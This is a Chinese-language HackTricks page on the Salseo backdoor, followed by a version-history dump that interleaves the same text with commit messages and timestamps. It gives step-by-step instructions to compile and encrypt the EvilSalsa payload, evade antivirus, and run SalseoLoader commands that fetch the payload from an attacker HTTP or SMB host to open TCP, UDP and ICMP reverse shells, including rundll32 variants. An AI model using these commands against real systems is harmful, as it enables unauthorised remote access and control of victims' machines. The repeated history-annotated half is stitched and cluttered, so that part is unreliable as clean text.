hacktricks/backdoors/salseo.md

# Salseo

<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。

</details>

## 编译二进制文件

从github下载源代码并编译**EvilSalsa**和**SalseoLoader**。您需要安装**Visual Studio**来编译代码。

为将要使用它们的Windows系统架构编译这些项目（如果Windows支持x64，请为该架构编译）。

您可以在Visual Studio中的**左侧"Build"选项卡**中的**"Platform Target"**中**选择架构**。

(\*\*如果找不到这些选项，请点击**"Project Tab"**，然后点击**"\<Project Name> Properties"**)

![](<../.gitbook/assets/image (132).png>)

然后，构建这两个项目（Build -> Build Solution）（日志中将显示可执行文件的路径）：

![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)

## 准备后门

首先，您需要对**EvilSalsa.dll**进行编码。您可以使用python脚本**encrypterassembly.py**或编译项目**EncrypterAssembly**来执行此操作：

### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows

### Windows
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
现在你已经拥有执行所有Salseo操作所需的一切：**编码的EvilDalsa.dll**和**SalseoLoader的二进制文件。**

**将SalseoLoader.exe二进制文件上传到机器上。它们不应该被任何杀毒软件检测到...**

## **执行后门**

### **获取TCP反向shell（通过HTTP下载编码的dll）**

记得启动一个nc作为反向shell监听器，以及一个HTTP服务器来提供编码的evilsalsa。
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **获取UDP反向shell（通过SMB下载编码的dll）**

记得启动一个nc作为反向shell监听器，并启动一个SMB服务器来提供编码的evilsalsa（impacket-smbserver）。
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
### **获取 ICMP 反向 shell（编码的 dll 已经在受害者内部）**

**这次你需要在客户端上使用一个特殊工具来接收反向 shell。下载：** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)

#### **禁用 ICMP 回复：**
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1

#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### 执行客户端：
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
#### 在受害者内部，让我们执行salseo操作：
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
## 编译 SalseoLoader 作为导出主函数的 DLL

使用 Visual Studio 打开 SalseoLoader 项目。

### 在主函数之前添加：\[DllExport]

![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)

### 为此项目安装 DllExport

#### **工具** --> **NuGet 包管理器** --> **管理解决方案的 NuGet 包...**

![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)

#### **在浏览选项卡中搜索 DllExport 包，并按 Install（接受弹出窗口）**

![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1).png>)

在您的项目文件夹中会出现文件：**DllExport.bat** 和 **DllExport\_Configure.bat**

### **卸载 DllExport**

点击 **卸载**（是的，这很奇怪，但相信我，这是必要的）

![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)

### **退出 Visual Studio 并执行 DllExport\_configure**

只需 **退出** Visual Studio

然后，转到您的 **SalseoLoader 文件夹** 并 **执行 DllExport\_Configure.bat**

选择 **x64**（如果您将在 x64 系统中使用它，这是我的情况），选择 **System.Runtime.InteropServices**（在 **DllExport 的命名空间** 中）并按 **应用**

![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>)

### **再次使用 Visual Studio 打开项目**

**\[DllExport]** 不应再被标记为错误

![](<../.gitbook/assets/image (8) (1).png>)

### 构建解决方案

选择 **输出类型 = 类库**（项目 --> SalseoLoader 属性 --> 应用程序 --> 输出类型 = 类库）

![](<../.gitbook/assets/image (10) (1).png>)

选择 **x64 平台**（项目 --> SalseoLoader 属性 --> 构建 --> 平台目标 = x64）

![](<../.gitbook/assets/image (9) (1) (1).png>)

要 **构建** 解决方案：构建 --> 构建解决方案（在输出控制台中将显示新 DLL 的路径）

### 测试生成的 Dll

将 Dll 复制粘贴到要测试的位置。

执行：
```
rundll32.exe SalseoLoader.dll,main
```
如果没有出现错误，那么你可能有一个功能正常的DLL！！

## 使用DLL获取shell

不要忘记使用一个**HTTP服务器**并设置一个**nc监听器**

### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD

### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
<details>

<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>

其他支持HackTricks的方式：

* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>
-												GitBook: [#3350] No subject

											
										
										
											2022-08-04 20:47:35 +00:00
+								# Salseo
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								支持HackTricks的其他方式：
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
 								- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
 								- **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
 								- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 编译二进制文件
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:29:36 +00:00
+								从github下载源代码并编译**EvilSalsa**和**SalseoLoader**。您需要安装**Visual Studio**来编译代码。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								为将要使用它们的Windows系统架构编译这些项目（如果Windows支持x64，请为该架构编译）。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								您可以在Visual Studio中的**左侧"Build"选项卡**中的**"Platform Target"**中**选择架构**。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								(\*\*如果找不到这些选项，请点击**"Project Tab"**，然后点击**"\<Project Name> Properties"**)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3354] No subject

											
										
										
											2022-08-10 14:32:58 +00:00
+								![](<../.gitbook/assets/image (132).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								然后，构建这两个项目（Build -> Build Solution）（日志中将显示可执行文件的路径）：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3513] No subject

											
										
										
											2022-09-27 00:14:52 +00:00
+								![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 准备后门
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								首先，您需要对**EvilSalsa.dll**进行编码。您可以使用python脚本**encrypterassembly.py**或编译项目**EncrypterAssembly**来执行此操作：
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3350] No subject

											
										
										
											2022-08-04 20:47:35 +00:00
+								### **Python**
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
 								python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
 								```
-												GitBook: [#3350] No subject

											
										
										
											2022-08-04 20:47:35 +00:00
+								### Windows
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								### Windows
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
 								EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
 								```
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								现在你已经拥有执行所有Salseo操作所需的一切：**编码的EvilDalsa.dll**和**SalseoLoader的二进制文件。**
 								**将SalseoLoader.exe二进制文件上传到机器上。它们不应该被任何杀毒软件检测到...**
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## **执行后门**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								### **获取TCP反向shell（通过HTTP下载编码的dll）**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								记得启动一个nc作为反向shell监听器，以及一个HTTP服务器来提供编码的evilsalsa。
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
 								```
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								### **获取UDP反向shell（通过SMB下载编码的dll）**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								记得启动一个nc作为反向shell监听器，并启动一个SMB服务器来提供编码的evilsalsa（impacket-smbserver）。
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
 								```
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								### **获取 ICMP 反向 shell（编码的 dll 已经在受害者内部）**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								**这次你需要在客户端上使用一个特殊工具来接收反向 shell。下载：** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								#### **禁用 ICMP 回复：**
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								sysctl -w net.ipv4.icmp_echo_ignore_all=1
 								#You finish, you can enable it again running:
 								sysctl -w net.ipv4.icmp_echo_ignore_all=0
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								#### 执行客户端：
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
 								```
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								#### 在受害者内部，让我们执行salseo操作：
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
 								```
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								## 编译 SalseoLoader 作为导出主函数的 DLL
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								使用 Visual Studio 打开 SalseoLoader 项目。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								### 在主函数之前添加：\[DllExport]
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:29:36 +00:00
+								![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								### 为此项目安装 DllExport
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								#### **工具** --> **NuGet 包管理器** --> **管理解决方案的 NuGet 包...**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:29:36 +00:00
+								![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								#### **在浏览选项卡中搜索 DllExport 包，并按 Install（接受弹出窗口）**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:29:36 +00:00
+								![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								在您的项目文件夹中会出现文件：**DllExport.bat** 和 **DllExport\_Configure.bat**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								### **卸载 DllExport**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								点击 **卸载**（是的，这很奇怪，但相信我，这是必要的）
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GITBOOK-3984: change request with no subject merged in GitBook

											
										
										
											2023-06-14 10:51:55 +00:00
+								![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								### **退出 Visual Studio 并执行 DllExport\_configure**
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2023-09-24 14:35:53 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								只需 **退出** Visual Studio
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								然后，转到您的 **SalseoLoader 文件夹** 并 **执行 DllExport\_Configure.bat**
-												Translated ['backdoors/salseo.md', 'forensics/basic-forensic-methodology

											
										
										
											2023-08-22 10:47:40 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								选择 **x64**（如果您将在 x64 系统中使用它，这是我的情况），选择 **System.Runtime.InteropServices**（在 **DllExport 的命名空间** 中）并按 **应用**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								### **再次使用 Visual Studio 打开项目**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								**\[DllExport]** 不应再被标记为错误
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GITBOOK-3980: change request with no subject merged in GitBook

											
										
										
											2023-06-13 10:12:02 +00:00
+								![](<../.gitbook/assets/image (8) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2023-09-24 14:35:53 +00:00
+								### 构建解决方案
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								选择 **输出类型 = 类库**（项目 --> SalseoLoader 属性 --> 应用程序 --> 输出类型 = 类库）
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3615] No subject

											
										
										
											2022-10-22 15:26:54 +00:00
+								![](<../.gitbook/assets/image (10) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								选择 **x64 平台**（项目 --> SalseoLoader 属性 --> 构建 --> 平台目标 = x64）
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3449] No subject

											
										
										
											2022-09-02 15:27:38 +00:00
+								![](<../.gitbook/assets/image (9) (1) (1).png>)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								要 **构建** 解决方案：构建 --> 构建解决方案（在输出控制台中将显示新 DLL 的路径）
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
+								### 测试生成的 Dll
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								将 Dll 复制粘贴到要测试的位置。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								执行：
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								rundll32.exe SalseoLoader.dll,main
 								```
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								如果没有出现错误，那么你可能有一个功能正常的DLL！！
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'backdoors/salseo.md', 'forensics/basic-forensi

											
										
										
											2023-12-16 14:32:12 +00:00
+								## 使用DLL获取shell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								不要忘记使用一个**HTTP服务器**并设置一个**nc监听器**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3350] No subject

											
										
										
											2022-08-04 20:47:35 +00:00
+								### Powershell
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								$env:pass="password"
 								$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
 								$env:lhost="10.2.0.5"
 								$env:lport="1337"
 								$env:shell="reversetcp"
 								rundll32.exe SalseoLoader.dll,main
 								```
-												Translated ['README.md', 'backdoors/salseo.md', 'cryptography/certificat

											
										
										
											2024-01-10 06:29:36 +00:00
+								### CMD
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								### CMD
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								set pass=password
 								set payload=http://10.2.0.5/evilsalsax64.dll.txt
 								set lhost=10.2.0.5
 								set lport=1337
 								set shell=reversetcp
 								rundll32.exe SalseoLoader.dll,main
 								```
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								<summary><strong>从零开始学习AWS黑客技术，成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS红队专家）</strong></a><strong>！</strong></summary>
-												Translated ['1911-pentesting-fox.md', 'README.md', 'backdoors/salseo.md'

											
										
										
											2023-12-30 12:15:15 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								其他支持HackTricks的方式：
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['a.i.-exploiting/bra.i.nsmasher-presentation/README.md', 'a.

											
										
										
											2024-02-04 16:26:04 +00:00
+								* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
 								* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
 								* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>